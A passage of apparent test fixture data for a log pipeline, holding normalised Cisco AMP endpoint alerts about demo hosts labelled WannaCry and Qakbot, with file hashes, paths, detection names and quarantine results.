Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275394960064595\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":6404,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275394960065000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Variant:Gen.20gl.1201", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Malicious", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275394960064595", + "event_type_id": 1090519054 + } + }, + "tags": 
[ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500128111Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":862000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + 
"id": "6419275390665097000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Delete pending", + "error_code": 3221225558 + }, + "detection_id": "6419275390665097297", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500130418Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":659000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot 
delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6419275390665097000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Cannot delete", + "error_code": 3221225761 + }, + "detection_id": "6419275390665097295", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", 
+ "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500132533Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275390665097000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": 
"Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275390665097297", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500134723Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275390665097000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": 
true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275390665097296", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "name": "lsass.exe", + "pid": 708, + "hash": { + "sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "md5": "4e568dbe3fff1a0025eb432dc929b78f" + } + }, + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "name": "mssecsvc.exe", + "path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "hash": { + "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "md5": "db349b97c37d22f5ea1d1841e3c89eb4" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500136852Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6419275390665097000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.Gen.20gl.1201", + "computer": { + "active": 
true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6419275390665097295", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "file": { + "hash": { + "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_WannaCry_Ransomware" + ], + "hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_WannaCry_Ransomware", + "hostname": "Demo_WannaCry_Ransomware" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500138978Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "kind": "alert", + "action": "Threat Quarantined", + "id": "6419275390665097000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "53:74:31:cb:37:50", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "53:74:31:cb:37:50" + ] + }, + "detection_id": "6419275390665097296", + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 553648143 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "file": { + "hash": { + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 2, + "ingested": 
"2021-09-12T17:31:54.500141093Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", + "kind": "alert", + "action": "Quarantine Failure", + "id": "6411525251028484000", + "category": [ + "malware" + ] + }, + "cisco": { + "amp": { + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "error": { + "description": "Object name not found", + "error_code": 3221225524 + 
}, + "detection_id": "6411525251028484105", + "event_type_id": 2164260880 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "md5": "6894b3834bd541fa85df79e44568acac" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500143175Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6411525251028484000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411525251028484105", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + 
"sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "md5": "6894b3834bd541fa85df79e44568acac" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:54.500145233Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat 
